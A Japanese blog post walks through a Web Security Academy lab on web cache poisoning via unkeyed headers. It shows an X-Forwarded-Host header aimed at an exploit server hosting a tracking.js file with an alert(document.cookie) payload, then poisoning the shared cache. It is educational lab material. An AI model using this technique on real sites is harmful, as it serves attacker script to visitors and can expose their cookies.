Hello there, ('ω')ノ

 

キーのないヘッダーを使用したWebキャッシュポイズニングを。

くれぐれもブラウザ内に保存されているローカルキャッシュと混同しないように。

 

 

レスポンスがキャッシュサーバからのものかどうかは。

ヘッダのhit、またはmissで判断できて。

また、保存期間から。

リクエストごとにキャッシュされた応答を使用できるかどうかを判断して。

キャッシュキーが一致する場合は。

キャッシュサーバは、保存された応答で応答できると判断して。

 

キャッシュなしの転送ルートは以下のとおりで。 

　User ⇨ Cache Server ⇨ Application Server

　　　　　　　　　　　　　⇩

　User ⇦ Cache Server ⇦ Application Server

 

そのときのレスポンスは、以下のとおりで。

　Cache-Control: max-age=30

　Age: 0

　X-Cache: miss

 

 

キャッシュされると、転送ルートは以下のように変化して。

　User ⇨ Cache Server

　　　　　　⇩

　User ⇦ Cache Server

 

そのときのレスポンスは、以下のとおりで。

Ageが30に達すると0にリセットされて。

　Cache-Control: max-age=30

　Age: 2

　X-Cache: hit

 

 

さて下記が、キャッシュキーでキー入力と呼ばれるもので。

　GET / HTTP/1.1
　Host: ac021ff51e2bdd5080340d5f003500cb.web-security-academy.net

 

他は、すべてキーなし入力で、キャッシュサーバーでは無視されるので。

Webキャッシュポイズニング攻撃を考えるには。

アプリケーションサーバで考慮されるキーなし入力を見つけることで。

 

 

キーなし入力というのは、以下のようなヘッダで。

　Accept:

　Accept-Language:

　Referer:

 

 

Sendしてみると、下記のレスポンスからサーバからの応答を確認できて。 

　Cache-Control: max-age=30
　Age: 0
　X-Cache: miss

 

 

もう一度、Sendすると今度は、キャッシュサーバからのようで。

　Cache-Control: max-age=30
　Age: 9
　X-Cache: hit

 

 

 ユーザーは、1分に1回ホームページにアクセスするとのことで。

キャッシュバスターを追加して、アクセスされないようにしておいて。

　?cachebuster=12345

 

Sendすると新たにサーバからレスポンスがかえってきているのを確認して。

　Cache-Control: max-age=30
　Age: 0
　X-Cache: miss

 

 

キーなしヘッダを追加して、レスポンスを確認すると反映されるのを確認して。

　X-Forwarded-Host: example.com

 

 

ちなみに追加前のレスポンスは、以下のとおりで。

 

 

リクエストで得られたアドレスをファイルに。

　/resources/js/tracking.js

 

ボディにはペイロードを。

　alert(document.cookie)

 

 

エクスプロイトサーバのURLをコピーして。

　https://ac531f391e2a220e805e00b801be004d.web-security-academy.net/

 

 

下記をリクエストサーバのURLに書き換えて。

現時点ではキャッシュバスタを知っている人間でないとレスポンスを得られないので。

　X-Forwarded-Host: ac531f391e2a220e805e00b801be004d.web-security-academy.net

 

 

キャッシュバスタを削除して、Sendしてキャッシュに保存させて。

 

 

 ホームページにもどって、リロードするとクリアできた。

 

 

Best regards, (^^ゞ